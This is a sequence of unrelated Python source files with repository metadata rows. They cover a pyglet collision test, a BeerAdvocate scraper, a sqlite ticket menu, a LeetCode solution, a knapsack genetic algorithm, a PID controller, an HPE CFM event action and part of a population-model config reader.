@window.event
def on_draw():
    """Pyglet draw handler: clear the frame, then draw projectile and soul."""
    window.clear()
    projectile.draw()
    soul.draw()
def move_forward(dt):
    """Clock callback (120 Hz): check collision; stop the schedule on a hit.

    The body after unschedule() looks like an abandoned image-comparison
    experiment: img1 is immediately overwritten, and start/img2/img1gray are
    never used afterwards — TODO confirm and remove.
    """
    # projectile.forward()
    # projectile.rotate(pi/180)
    if soul.check_for_collision(projectile):
        print('hit!',
              projectile.get_left_bound(),
              projectile.get_right_bound(),
              soul.get_left_bound(),
              )
        clock.unschedule(move_forward)
        start = time.time()
        img1 = cv.imread('test_images/dull_knife.png')
        # NOTE(review): the line above is dead — img1 is overwritten here.
        img1 = projectile.np
        # img2 = cv.imread('test_images/heart_not_overlapping_3.png')
        img2 = cv.imread('test_images/heart_overlapping_2.png')
        img1gray = cv.threshold(img1, 1, 255, cv.THRESH_BINARY)
if __name__ == '__main__':
    # Step the projectile at 120 Hz, then enter the pyglet main loop.
    pyglet.clock.schedule_interval(move_forward, 1 / 120)
    pyglet.app.run()
|
KimPalao/Headshot
|
collision_test.py
|
collision_test.py
|
py
| 1,686 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40176582534
|
#import gevent.monkey
#gevent.monkey.patch_all()
import os
import sys
import time
import pprint
import logging
import requests
import grequests
import threading
import urllib.parse
from bs4 import BeautifulSoup
import db
import parse
# Module logger: everything at DEBUG+, split across two handlers below.
logger = logging.getLogger('scraper')
logger.setLevel(logging.DEBUG)

SRC_DIR = os.path.dirname(os.path.realpath(__file__))
LOG_DIR = os.path.join(SRC_DIR, "..", "log")
LOG_FILENAME = "scraper.log"
LOG_FILEPATH = os.path.join(LOG_DIR, LOG_FILENAME)

# File handler: ERROR and above, log file truncated on each run (mode='w').
fh = logging.FileHandler(LOG_FILEPATH, mode='w')
fh.setLevel(logging.ERROR)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)

# Set low so server isn't bombarded and begins to refuse.
MAX_SESSIONS = 1

domain = 'https://www.beeradvocate.com/'
places_rel_url = 'place/list/'
places_url = urllib.parse.urljoin(domain, places_rel_url)
places_params = {'start': 0, 'brewery': 'Y', 'sort': 'name'}

# Shared scrape counters, updated from the grequests callbacks.
progress = {'breweries': 0, 'beers': 0, 'errors': 0}
def exception_handler(r, e):
    """grequests error callback: count the failure and log request + exception."""
    progress['errors'] += 1
    logger.error(f"REQUEST URL: {r.url} EXCEPTION: {e}")
    logger.error(f"{progress['errors']} ERRORS HAVE OCCURRED")
def get_last_page_start():
    """Return the 'start' offset of the last page of the brewery listing.

    Fetches the first listing page, follows the "last" pagination link, and
    parses its 'start' query parameter.
    """
    response = requests.get(url=places_url, params=places_params)
    soup = BeautifulSoup(response.text, features='lxml')
    last_page_tag = soup.find('a', text="last")
    last_link = last_page_tag['href']
    parsed = urllib.parse.urlparse(last_link)
    last_start_str = urllib.parse.parse_qs(parsed.query)['start'][0]
    last_start = int(last_start_str)
    # Fix: this previously called logging.debug() on the unconfigured root
    # logger; use the module logger like the rest of the file.
    logger.debug("get_last_page_start: last_start: {}".format(last_start))
    return last_start
def get_breweries():
    """Queue one async request per listing page and map them all."""
    STEP = 20
    last_page_start = get_last_page_start()
    reqs = [
        grequests.get(places_url, params=dict(places_params, start=start),
                      callback=get_breweries_handler)
        for start in range(0, last_page_start, STEP)
    ]
    logger.info("STARTING THREADS to fetch brewery details.")
    grequests.map(reqs, size=MAX_SESSIONS, exception_handler=exception_handler)
def get_breweries_handler(response, *args, **kwargs):
    """grequests callback: parse one listing page and queue its breweries."""
    soup = BeautifulSoup(response.text, features='lxml')
    page_breweries = parse.places.breweries(soup)
    logger.info(f"this_page_breweries: {pprint.pformat(page_breweries)}")
    logger.info(f"response time (s): {response.elapsed}")
    db.breweries.extendleft(page_breweries)
    progress['breweries'] += len(page_breweries)
    logger.info(f"FETCHED: {progress['breweries']} breweries.")
def get_brewery_details(paths):
    """Asynchronously fetch each brewery profile page with all beers shown."""
    params = {'view': 'beers', 'show': 'all'}
    reqs = [
        grequests.get(urllib.parse.urljoin(domain, path), params=params,
                      callback=get_brewery_details_handler)
        for path in paths
    ]
    logger.info("STARTING THREADS to fetch brewery details.")
    grequests.map(reqs, size=MAX_SESSIONS, exception_handler=exception_handler)
def get_brewery_details_handler(response, *args, **kwargs):
    """grequests callback: parse a brewery profile page; queue the brewery and its beers."""
    logger.info("RESPONSE received from {}".format(response.url))
    soup = BeautifulSoup(response.text, features='lxml')
    #############################################################################
    # This is possibly redundant as all this information can be gathered in the
    # previous operation when the links are fetched from places list.
    brewery = {}
    brewery['id'] = parse.url.brewery_id(response.url)
    brewery['name'] = parse.brewery.name(soup)
    db.breweries.appendleft(brewery)
    logger.info("ADDED brewery {} to write queue.".format(pprint.pformat(brewery)))
    #############################################################################
    this_brewery_beers = parse.brewery.beers(soup)
    db.beers.extendleft(this_brewery_beers)
    logger.info("ADDED {} beers to write queue.".format(len(this_brewery_beers)))
    progress['breweries'] += 1
    progress['beers'] += len(this_brewery_beers)
    logger.info("FETCHED: {} breweries and {} beers.".format(progress['breweries'], progress['beers']))
    # Throttle: one-second pause per page; with MAX_SESSIONS = 1 the callbacks
    # run sequentially, so this spaces out requests to the server.
    time.sleep(1)
def get_beer_details(paths):
    """Asynchronously fetch individual beer profile pages.

    Redundant when first populating the database (the brewery profile page
    already carries everything except ranking, which can be derived from
    stored scores), but useful for refreshing beers already in the database —
    though even then the brewery fetch has usually been done anyway.
    """
    reqs = [
        grequests.get(urllib.parse.urljoin(domain, path), allow_redirects=True,
                      callback=get_beer_details_handler)
        for path in paths
    ]
    logger.info("STARTING THREADS to fetch beer details.")
    grequests.map(reqs, size=MAX_SESSIONS, exception_handler=exception_handler)
def get_beer_details_handler(response, *args, **kwargs):
    """grequests callback: parse one beer profile page and queue it for the DB writer."""
    # Fix: leftover debug print()s removed (one of them dumped the entire
    # parsed page to stdout); log at DEBUG on the module logger instead.
    logger.debug("beer response %s from %s", response.status_code, response.url)
    soup = BeautifulSoup(response.text, features='lxml')
    beer = {}
    beer['id'] = parse.url.beer_id(response.url)
    beer['brewery_id'] = parse.url.brewery_id(response.url)
    beer['name'] = parse.beer.name(soup)
    logger.info("name: {}".format(beer['name']))
    beer['score'] = parse.beer.score(soup)
    logger.info("score: {}".format(beer['score']))
    beer['ratings'] = parse.beer.ratings(soup)
    logger.info("ratings: {}".format(beer['ratings']))
    beer['ranking'] = parse.beer.ranking(soup)
    logger.info("ranking: {}".format(beer['ranking']))
    beer['style'] = parse.beer.style(soup)
    logger.info("style: {}".format(beer['style']))
    beer['abv'] = parse.beer.abv(soup)
    logger.info("abv: {}".format(beer['abv']))
    db.beers.appendleft(beer)
    logger.info("ADDED beer with ID = {} to write queue.".format(beer['id']))
def breweries():
    """Scrape the brewery listing while a DB consumer thread drains the queue."""
    writer = threading.Thread(target=db.consumer)
    writer.start()
    get_breweries()
    db.fetching_breweries = False
    writer.join()
def brewery_details():
    """Fetch the beer list for every brewery already stored in the DB."""
    brewery_ids = db.read_brewery_ids()
    logger.info(f"{len(brewery_ids)} breweries to fetch")
    profile_paths = [f"/beer/profile/{b}/" for b in brewery_ids]
    writer = threading.Thread(target=db.consumer)
    writer.start()
    get_brewery_details(profile_paths)
    db.fetching_breweries = False
    writer.join()
def beer_details():
    """Fetch beer detail pages for beers already in the DB while a writer thread runs."""
    to_fetch = db.read_beer_ids()
    logger.info("{} beers to fetch".format(len(to_fetch)))
    paths = ["/beer/profile/{}/{}".format(b[0], b[1]) for b in to_fetch]
    consumer_thread = threading.Thread(target=db.consumer)
    consumer_thread.start()
    # NOTE(review): only the first path is fetched (paths[0:1]) — looks like a
    # leftover debugging limit; confirm before scraping the full list.
    get_beer_details(paths[0:1])
    # NOTE(review): this sets fetching_breweries, not a beer-specific flag —
    # verify this is the flag db.consumer actually watches.
    db.fetching_breweries = False
    consumer_thread.join()
def print_usage():
    """Print CLI usage for the scraper entry point."""
    print("USAGE: python3 scraper.py {breweries|brewery_details|beer_details}")
if __name__ == "__main__":
    # Dispatch on the single CLI argument; anything else prints usage.
    if len(sys.argv) < 2:
        print_usage()
    elif len(sys.argv) == 2 and sys.argv[1] == "brewery_details":
        brewery_details()
    elif len(sys.argv) == 2 and sys.argv[1] == "breweries":
        breweries()
    elif len(sys.argv) == 2 and sys.argv[1] == "beer_details":
        beer_details()
    else:
        print_usage()
|
JohnMcAninley/beer-goggles
|
scraper/src/scraper.py
|
scraper.py
|
py
| 7,113 |
python
|
en
|
code
| 0 |
github-code
|
6
|
41095556533
|
import sqlite3

# Module-level connection/cursor shared by every function below.
conn = sqlite3.connect("tickets5.db")
cur = conn.cursor()
def displayAllTickets():
    """Print every row of the tickets table, or a message when it is empty."""
    cur.execute("SELECT * FROM tickets")
    rows = cur.fetchall()
    if rows:
        printStuff(rows)
    else:
        print("No data found")
        print()
def addTicket():
    """Prompt for ticket fields and insert one row.

    Tuple order must match the table columns:
    (id, actual_speed, posted_speed, age, violator_sex); id is None so
    SQLite assigns the next rowid automatically.
    """
    actual_speed = int(input("Enter actual speed: "))
    posted_speed = int(input("Enter posted speed: "))
    age = int(input("Enter age of offender: "))
    violator_sex = str(input("Enter sex of offender: "))
    data = (None, actual_speed, posted_speed, age, violator_sex)
    sql = "INSERT INTO tickets VALUES (?, ?, ?, ?, ?)"
    cur.execute(sql, data)
    conn.commit()
def displayTicketsByOffender():
    """Show all tickets matching the offender sex typed by the user."""
    sex = input("Enter sex of offender: ")
    cur.execute("SELECT * FROM tickets WHERE violator_sex = ?", (sex,))
    rows = cur.fetchall()
    if rows:
        printStuff(rows)
    else:
        print("Name not found")
        print()
def printStuff(data):
    """Pretty-print ticket rows.

    Each row is (ticket_id, actual_speed, posted_speed, age, violator_sex),
    matching the INSERT order in addTicket().
    """
    print("%-10s %-12s %-10s %-5s %-12s " % ("ticketID", "Posted MPH", "MPH Over", "Age", "Violator Sex"))
    for row in data:
        over = row[1] - row[2]  # actual minus posted = MPH over the limit
        # Fix: the 'Posted MPH' column previously printed row[1], which is the
        # actual speed; the posted limit is row[2].
        print(" %-10d %-12d %-10d %-5d %-12s " % (row[0], row[2], over, row[3], row[4]))
    print()
def main():
    """Interactive menu loop: list, add, filter, or save & exit."""
    while True:
        print("""
Menu options. Choose 1, 2, 3, or 4:
1. Display all Tickets
2. Add a Ticket
3. Filter by Offender Sex
4. Save & Exit
""")
        opt = input("Enter your choice, 1, 2, 3, or 4: ")
        if opt == "1":
            displayAllTickets()
        elif opt == "2":
            addTicket()
        elif opt == "3":
            displayTicketsByOffender()
        elif opt == "4":
            print()
            print("Goodbye")
            if conn:
                # Fix: 'conn.close' only referenced the method and never
                # called it, so the connection was never actually closed.
                conn.close()
            break
        else:
            print("Invalid entry, please re-enter your choice")
            print()


main()
|
LilGotit/brain-drizzle
|
TicketsDatabase/ticketDatabase.py
|
ticketDatabase.py
|
py
| 2,130 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43627424884
|
from typing import List
class Solution:
    def numOfMinutes(self, n: int, headID: int, manager: List[int], informTime: List[int]) -> int:
        """Return the time for news to reach every employee (LeetCode 1376).

        BFS from the head, accumulating inform times along each chain.

        Fixes over the original: list.pop(0) was O(n) per dequeue (deque is
        O(1)) and `employees.get(m, []) + [i]` rebuilt the subordinate list on
        every insert (defaultdict appends in place).
        """
        from collections import defaultdict, deque
        subordinates = defaultdict(list)
        for emp, boss in enumerate(manager):
            if emp != headID:
                subordinates[boss].append(emp)
        queue = deque([(headID, informTime[headID])])
        res = 0
        while queue:
            node, elapsed = queue.popleft()
            for emp in subordinates[node]:
                emp_time = elapsed + informTime[emp]
                res = max(res, emp_time)
                queue.append((emp, emp_time))
        return res

    def test(self):
        """Run the sample cases and print the results."""
        test_cases = [
            [1, 0, [-1], [0]],
            [6, 2, [2, 2, -1, 2, 2, 2], [0, 0, 1, 0, 0, 0]],
            [7, 6, [1, 2, 3, 4, 5, 6, -1], [0, 6, 5, 4, 3, 2, 1]],
            [4, 2, [3, 3, -1, 2], [0, 0, 162, 914]],
            [15, 0, [-1, 0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6], [1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0]],
            [11, 4, [5, 9, 6, 10, -1, 8, 9, 1, 9, 3, 4], [0, 213, 0, 253, 686, 170, 975, 0, 261, 309, 337]],
        ]
        for n, headID, manager, informTime in test_cases:
            res = self.numOfMinutes(n, headID, manager, informTime)
            print('res: %s' % res)
            print('-=' * 30 + '-')


if __name__ == '__main__':
    Solution().test()
|
MichaelTQ/LeetcodePythonProject
|
solutions/leetcode_1351_1400/LeetCode1376_TimeNeededToInformAllEmployees.py
|
LeetCode1376_TimeNeededToInformAllEmployees.py
|
py
| 1,290 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42535314476
|
# OKANCAN COSAR
# 12253018
import Helper
import Constant
import Step
import sys
populasyon = []  # current GA population; (re)built inside main()
def Calculate(populasyonlar):
    """Run one GA generation: parent selection, recombination/mutation, survivor selection."""
    # Select the parents (PARENT SELECT).
    parents = Step.parentSelect(populasyonlar)
    # Cross over the parents (RECOMBINE) and mutate the offspring (MUTATE).
    cocuklar = Step.recombineAndMutate(parents)
    # Evaluate fitness for offspring + current population, sort, and keep the
    # top candidates (survivor selection; Step.survivalSelect keeps the best 50).
    populasyonlarx = Step.survivalSelect(cocuklar + populasyonlar)
    return populasyonlarx
def main():
    """Run the genetic algorithm for Constant.ITERASYONSAYISI generations."""
    global populasyon
    # Repeat until the stop condition (fixed generation count) is reached.
    for iterasyon in range(Constant.ITERASYONSAYISI):
        if iterasyon == 0:
            # Create the initial population at random (INITIALISE).
            populasyon = Step.Initialise()
            populasyon = Calculate(populasyon)
        else:
            populasyon = Calculate(populasyon)
from datetime import datetime
if __name__ == '__main__':
    # f = open("out.txt", "w")
    # sys.stdout = f
    # Fix: the original subtracted only the .microsecond fields of two
    # datetimes; that field wraps every second, so the printed value was
    # wrong (and could be negative) for runs longer than one second.
    start = datetime.now()
    main()
    finish = datetime.now()
    print((finish - start).total_seconds() * 1000)  # elapsed milliseconds
|
OkancanCosar/01-Knapsack-with-GA
|
python/index.py
|
index.py
|
py
| 1,827 |
python
|
tr
|
code
| 2 |
github-code
|
6
|
69817132988
|
#!/usr/bin/env python3
class PIDController:
    """Discrete PID controller.

    Each call to step() recomputes output_list (the P, I and D terms) and
    output_sum (their total).
    """

    def __init__(self, kp, ki, kd, dt):
        """Store the gains and the sampling interval.

        :param kp: proportional gain
        :param ki: integral gain
        :param kd: derivative gain
        :param dt: time interval between calls to step()
        """
        self.__kp = kp
        self.__ki = ki
        self.__kd = kd
        self.__dt = dt
        self.__error_prev = None      # error from the previous step; None before the first call
        self.__error_integrate = 0    # running sum of all errors seen so far
        self.output_list = [0, 0, 0]  # [P, I, D] components of the last output
        self.output_sum = 0           # sum of the three components

    def step(self, err):
        """Advance the controller one time step with the current error *err*."""
        self.__error_integrate += err
        # Derivative term is zero on the very first step (no previous error).
        if self.__error_prev is None:
            derivative = 0.0
        else:
            derivative = (err - self.__error_prev) / self.__dt
        self.__error_prev = err
        self.output_list = [
            self.__kp * err,
            self.__ki * self.__error_integrate,
            self.__kd * derivative,
        ]
        self.output_sum = sum(self.output_list)
|
derekdecost/Differential-Drive-Robot
|
packages/pid_controller/src/pid_controller.py
|
pid_controller.py
|
py
| 1,392 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26531291291
|
from pyhpecfm import system
from lib.actions import HpecfmBaseAction
class eventLookup(HpecfmBaseAction):
    """StackStorm action: fetch CFM audit logs and return the EVENT records."""

    def run(self):
        audit_records = system.get_audit_logs(self.client)
        if not isinstance(audit_records, list):
            # Unexpected payload from the API: surface it as a failure result.
            return (False, audit_records)
        # Keep only EVENT records, reshaped into the u_* output schema.
        events = [
            {
                'u_eventType': record['data']['event_type'],
                'u_typex': record['record_type'],
                'u_sev': record['severity'],
                'u_uuid': record['uuid'],
                'u_desc': record['description'],
                'u_name': record['data']['object_name'],
                'u_typeo': record['data']['object_type'],
            }
            for record in audit_records
            if record['record_type'] == 'EVENT'
        ]
        return (True, events)
|
HewlettPackard/stackstorm-hpe-cfm
|
actions/get_events.py
|
get_events.py
|
py
| 1,125 |
python
|
en
|
code
| 1 |
github-code
|
6
|
10251411217
|
"""
Configuration reader for the population_gravity model
@author Chris R. Vernon
@email: [email protected]
License: BSD 2-Clause, see LICENSE and DISCLAIMER files
"""
import datetime
import os
import simplejson
import rasterio
import yaml
import pandas as pd
import population_gravity.downscale_utilities as utils
class ReadConfig:
"""Read configuration data either provided in the configuration YAML file or as passed in via arguments.
:param config_file: string. Full path to configuration YAML file with file name and
extension. If not provided by the user, the code will default to the
expectation of alternate arguments.
:param grid_coordinates_file: string. Full path with file name and extension to the CSV file
containing the coordinates for each 1 km grid cell within the target
state. File includes a header with the fields XCoord, YCoord, FID.
Where data types and field descriptions are as follows:
(XCoord, float, X coordinate in meters),
(YCoord, float, Y coordinate in meters),
(FID, int, Unique feature id)
:param historical_suitability_raster: string. Full path with file name and extension to the suitability
raster containing values from 0.0 to 1.0 for each 1 km grid cell
representing suitability depending on topographic and land use and
land cover characteristics within the target state.
:param base_rural_pop_raster: string. Full path with file name and extension to a raster containing
rural population counts for each 1 km grid cell for the historical
base time step.
:param base_urban_pop_raster: string. Full path with file name and extension to a raster containing
urban population counts for each 1 km grid cell for the historical
base time step.
:param projected_population_file: string. Full path with file name and extension to a CSV file containing
population projections per year separated into urban and rural
categories. Field descriptions for require fields as follows:
(Year, integer, four digit year),
(UrbanPop, float, population count for urban),
(RuralPop, float, population count for rural),
(Scenario, string, scenario as set in the `scenario` variable)
:param one_dimension_indices_file: string. Full path with file name and extension to the text file
containing a file structured as a Python list (e.g. [0, 1]) that
contains the index of each grid cell when flattened from a 2D array to
a 1D array for the target state.
:param output_directory: string. Full path with file name and extension to the output directory
where outputs and the log file will be written.
:param alpha_urban: float. Alpha parameter for urban. Represents the degree to which the
population size of surrounding cells translates into the suitability
of a focal cell. A positive value indicates that the larger the
population that is located within the 100 km neighborhood, the more
suitable the focal cell is. More negative value implies less suitable.
Acceptable range: -2.0 to 2.0
:param beta_urban: float. Beta parameter for urban. Reflects the significance of distance
to surrounding cells on the suitability of a focal cell. Within 100 km,
beta determines how distance modifies the effect on suitability.
Acceptable range: -0.5 to 2.0
:param alpha_rural: float. Alpha parameter for rural. Represents the degree to which the
population size of surrounding cells translates into the suitability
of a focal cell. A positive value indicates that the larger the
population that is located within the 100 km neighborhood, the more
suitable the focal cell is. More negative value implies less suitable.
Acceptable range: -2.0 to 2.0
:param beta_rural: float. Beta parameter for rural. Reflects the significance of distance
to surrounding cells on the suitability of a focal cell. Within 100 km,
beta determines how distance modifies the effect on suitability.
Acceptable range: -0.5 to 2.0
:param scenario: string. String representing the scenario with no spaces. Must match
what is in the `projected_population_file` if passing population
projections in using a file.
:param state_name: string. Target state name with no spaces separated by an underscore.
:param historic_base_year: int. Four digit historic base year.
:param projection_year: int. Four digit first year to process for the projection.
:param projection_end_year: int. Four digit last year to process for the projection.
:param time_step: int. Number of steps (e.g. number of years between projections)
:param rural_pop_proj_n: float. Rural population projection count for the projected year being
calculated. These can be read from the `projected_population_file`
instead.
:param urban_pop_proj_n: float. Urban population projection count for the projected year being
calculated. These can be read from the `projected_population_file`
instead.
:param calibration_urban_year_one_raster: string. Only used for running calibration. Full path with file name and
extension to a raster containing urban population counts for each 1 km
grid cell for year one of the calibration.
:param calibration_urban_year_two_raster: string. Only used for running calibration. Full path with file name and
extension to a raster containing urban population counts for each 1 km
grid cell for year two of the calibration.
:param calibration_rural_year_one_raster: string. Only used for running calibration. Full path with file name and
extension to a raster containing rural population counts for each 1 km
grid cell for year one of the calibration.
:param calibration_rural_year_two_raster: string. Only used for running calibration. Full path with file name and
extension to a raster containing rural population counts for each 1 km
grid cell for year two of the calibration.
:param kernel_distance_meters: float. Distance kernel in meters; default 100,000 meters.
:param write_raster: boolean. Optionally export raster output; Default True
:param write_csv: boolean. Optionally export raster as a CSV file without nodata values
:param write_array2d: boolean. Optionally export a NumPy 2D array for each output in the shape
of the template raster
:param write_array1d: boolean. Optionally export a Numpy 1D flattened array of only grid cells
within the target state
:param run_number: int. Add on for the file name when running sensitivity analysis
:param write_logfile: boolean. Optionally write log to file.; Default True
:param compress_csv: boolean. Optionally compress CSV file to GZIP if outputting in CSV
:param output_total: boolean. Choice to output total (urban + rural) dataset; Defualt True
"""
# format for datetime string
DATETIME_FORMAT = '%Y-%m-%d_%Hh%Mm%Ss'
# key names from YAML config file
OUT_DIR_KEY = 'output_directory'
START_STEP_KEY = 'start_step'
THROUGH_STEP_KEY = 'through_step'
ALPHA_KEY = 'alpha_param'
BETA_KEY = 'beta_param'
# definition of acceptable range of values for parameters
MAX_PARAM_VALUE = 10.0
MIN_PARAM_VALUE = -10.0
    def __init__(self, config_file=None, grid_coordinates_file=None, historical_suitability_raster=None,
                 base_rural_pop_raster=None, base_urban_pop_raster=None, projected_population_file=None,
                 one_dimension_indices_file=None, output_directory=None, alpha_urban=None, beta_urban=None,
                 alpha_rural=None, beta_rural=None, scenario=None, state_name=None, historic_base_year=None,
                 projection_year=None, rural_pop_proj_n=None,
                 urban_pop_proj_n=None, calibration_urban_year_one_raster=None, calibration_urban_year_two_raster=None,
                 calibration_rural_year_one_raster=None, calibration_rural_year_two_raster=None,
                 kernel_distance_meters=None, write_raster=True, write_csv=False, write_array1d=False,
                 write_array2d=False, run_number='', write_logfile=True, compress_csv=True, output_total=True,
                 write_suitability=False, pass_one_alpha_upper=1.0, pass_one_alpha_lower=-1.0,
                 pass_one_beta_upper=1.0, pass_one_beta_lower=0.0, pass_two_alpha_upper=2.0, pass_two_alpha_lower=-2.0,
                 pass_two_beta_upper=2.0, pass_two_beta_lower=-0.5, brute_n_alphas=10, brute_n_betas=5):
        """Store settings and derive run-time objects.

        Parameters are described in the class docstring. Underscore-prefixed
        attributes are raw values; the matching properties validate them
        lazily on access.
        """
        self._config_file = config_file
        self._alpha_urban = alpha_urban
        self._alpha_rural = alpha_rural
        self._beta_urban = beta_urban
        self._beta_rural = beta_rural
        self._kernel_distance_meters = kernel_distance_meters
        self._output_directory = output_directory
        self.grid_coordinates_file = self.validate_file(grid_coordinates_file)
        self.grid_coordinates_array = self.get_grid_coordinates_array()
        # Full path with file name and extension to the suitability raster containing values from 0.0 to 1.0
        # for each 1 km grid cell representing suitability depending on topographic and land use and land cover
        # characteristics within the target state.
        self.historical_suitability_raster = self.validate_file(historical_suitability_raster)
        self.base_rural_pop_raster = self.validate_file(base_rural_pop_raster)
        self.base_urban_pop_raster = self.validate_file(base_urban_pop_raster)
        self._projected_population_file = projected_population_file
        self._one_dimension_indices_file = one_dimension_indices_file
        # Target scenario name (lower-cased to match projection file contents)
        self.scenario = scenario.lower()
        # Target state name
        self.state_name = state_name.lower()
        # Four digit historic base year
        self.historic_base_year = self.validate_step(historic_base_year, 'historic_base_year')
        # Four digit first year to process for the projection
        self.projection_year = self.validate_step(projection_year, 'projection_year')
        self._rural_pop_proj_n = rural_pop_proj_n
        self._urban_pop_proj_n = urban_pop_proj_n
        # Optionally save outputs to a raster
        self.write_raster = write_raster
        # Optionally export raster as a CSV file without nodata values; option set to compress CSV using gzip.
        # Exports values for non-NODATA grid cells as field name `value`
        self.write_csv = write_csv
        # Optionally save outputs to a 1D array for cells within the target state
        self.write_array1d = write_array1d
        # Optionally save outputs to a 2D array in the shape of the template raster
        self.write_array2d = write_array2d
        # An integer add on for the file name when running sensitivity analysis
        self.run_number = run_number
        # Optionally write log outputs to a file
        self.write_logfile = write_logfile
        # Compress CSV to GZIP option
        self.compress_csv = compress_csv
        # Choice to output total dataset (urban + rural)
        self.output_total = output_total
        self.write_suitability = write_suitability
        # specific to calibration run
        self.calibration_urban_year_one_raster = calibration_urban_year_one_raster
        self.calibration_urban_year_two_raster = calibration_urban_year_two_raster
        self.calibration_rural_year_one_raster = calibration_rural_year_one_raster
        self.calibration_rural_year_two_raster = calibration_rural_year_two_raster
        # calibration parameter search bounds (pass one and pass two) and
        # brute-force grid resolution
        self.pass_one_alpha_upper = pass_one_alpha_upper
        self.pass_one_alpha_lower = pass_one_alpha_lower
        self.pass_one_beta_upper = pass_one_beta_upper
        self.pass_one_beta_lower = pass_one_beta_lower
        self.pass_two_alpha_upper = pass_two_alpha_upper
        self.pass_two_alpha_lower = pass_two_alpha_lower
        self.pass_two_beta_upper = pass_two_beta_upper
        self.pass_two_beta_lower = pass_two_beta_lower
        self.brute_n_alphas = brute_n_alphas
        self.brute_n_betas = brute_n_betas
        # get a copy of the raster metadata from a states input raster
        self.template_raster_object, self.metadata = utils.get_raster_with_metadata(self.historical_suitability_raster)
        # import population projection file if exists
        self.df_projected = self.process_df_projected()
        # Get a bounding box from the historical raster
        self.bbox = utils.create_bbox(self.template_raster_object)
        # Get a current time in a string matching the specified datetime format
        self.date_time_string = datetime.datetime.now().strftime(self.DATETIME_FORMAT)
        # Convenience wrapper for the DATETIME_FORMAT class attribute
        self.datetime_format = self.DATETIME_FORMAT
        # Validate output directory
        self.output_directory = self.set_output_directory()
        # Full path with file name and extension to the logfile
        self.logfile = os.path.join(self.output_directory, f'logfile_{self.scenario}_{self.state_name}_{self.date_time_string}.log')
    @property
    def alpha_urban(self):
        """Alpha urban parameter for model (validated on every access)."""
        return self.validate_parameter(self._alpha_urban, 'alpha_urban')

    @alpha_urban.setter
    def alpha_urban(self, value):
        """Setter for alpha urban parameter.

        NOTE(review): when a YAML config file is loaded, validate_parameter
        reads the value from the config key and ignores *value* — confirm
        this precedence is intended (same applies to the setters below).
        """
        self._alpha_urban = self.validate_parameter(value, 'alpha_urban')

    @property
    def alpha_rural(self):
        """Alpha rural parameter for model."""
        return self.validate_parameter(self._alpha_rural, 'alpha_rural')

    @alpha_rural.setter
    def alpha_rural(self, value):
        """Setter for alpha rural parameter."""
        self._alpha_rural = self.validate_parameter(value, 'alpha_rural')

    @property
    def beta_urban(self):
        """Beta urban parameter for model."""
        return self.validate_parameter(self._beta_urban, 'beta_urban')

    @beta_urban.setter
    def beta_urban(self, value):
        """Setter for beta urban parameter."""
        self._beta_urban = self.validate_parameter(value, 'beta_urban')

    @property
    def beta_rural(self):
        """Beta rural parameter for model."""
        return self.validate_parameter(self._beta_rural, 'beta_rural')

    @beta_rural.setter
    def beta_rural(self, value):
        """Setter for beta rural parameter."""
        self._beta_rural = self.validate_parameter(value, 'beta_rural')

    @property
    def kernel_distance_meters(self):
        """Distance kernel in meters; default 100,000 meters."""
        return self.validate_float(self._kernel_distance_meters)

    @kernel_distance_meters.setter
    def kernel_distance_meters(self, value):
        """Setter for kernel_distance_meters.

        NOTE(review): unlike the alpha/beta setters this stores the raw value
        with no validation (validation only happens in the getter) — confirm
        the asymmetry is intentional.
        """
        self._kernel_distance_meters = value
    def process_df_projected(self):
        """Load the population projection file if projections were not passed directly.

        Returns a DataFrame with lower-cased column names and a lower-cased
        'scenario' column, or None when explicit urban/rural projection counts
        were supplied instead of a file.
        """
        if (self.urban_pop_proj_n is None) and (self.rural_pop_proj_n is None):
            df = pd.read_csv(self.projected_population_file)
            # make header lower case
            df.columns = [i.lower() for i in df.columns]
            # make scenario column lower case
            df['scenario'] = df['scenario'].str.lower()
            return df
        else:
            return None

    def set_output_directory(self):
        """Validate the output directory.

        Uses the YAML config value (OUT_DIR_KEY) when a config file was given,
        otherwise the constructor argument.
        """
        if self.config is None:
            return self.validate_directory(self._output_directory)
        else:
            key = self.validate_key(self.config, self.OUT_DIR_KEY)
            return self.validate_directory(key)
    @property
    def historical_suitability_2darray(self):
        """Read in historical suitability mask as a 2D array.

        NOTE: re-reads the raster on every access (no caching).
        """
        return utils.raster_to_array(self.historical_suitability_raster)

    @property
    def historical_suitability_array(self):
        """Flattened (1D) historical suitability array."""
        return self.historical_suitability_2darray.flatten()

    @property
    def df_indicies(self):
        """Data frame of (row, column) indices in the shape of the raster array.

        Name spelling ("indicies") kept for API compatibility.
        """
        return utils.all_index_retriever(self.historical_suitability_2darray, ["row", "column"])

    @property
    def one_dimension_indices_file(self):
        """File describing grid indices of points that fall within the state boundary."""
        return self.validate_file(self._one_dimension_indices_file)

    @property
    def one_dimension_indices(self):
        """Grid indices for the state, loaded from the JSON-style list file."""
        with open(self.one_dimension_indices_file, 'r') as r:
            return simplejson.load(r)

    def get_grid_coordinates_array(self):
        """Load the grid coordinates CSV as an (XCoord, YCoord, FID) array sorted by FID."""
        # return np.genfromtxt(self.grid_coordinates_file, delimiter=',', skip_header=1, usecols=(0, 1, 2), dtype=float)
        df = pd.read_csv(self.grid_coordinates_file)
        df.sort_values('FID', inplace=True)
        df.set_index('FID', drop=False, inplace=True)
        df.index.name = None
        df = df[['XCoord', 'YCoord', 'FID']].copy()
        return df.values
    @property
    def urban_pop_proj_n(self):
        """Urban population projection count for the projected year being calculated. These can be read from
        the `projected_population_file` instead.
        """
        return self.validate_float(self._urban_pop_proj_n)

    @property
    def rural_pop_proj_n(self):
        """Rural population projection count for the projected year being calculated. These can be read from
        the `projected_population_file` instead.
        """
        return self.validate_float(self._rural_pop_proj_n)

    @property
    def projected_population_file(self):
        """Full path with file name and extension to a CSV file containing population projections per year
        separated into urban and rural categories.
        """
        return self.validate_file(self._projected_population_file)

    @property
    def config(self):
        """Read the YAML config file object.

        NOTE(review): yaml.load() without an explicit Loader is deprecated and
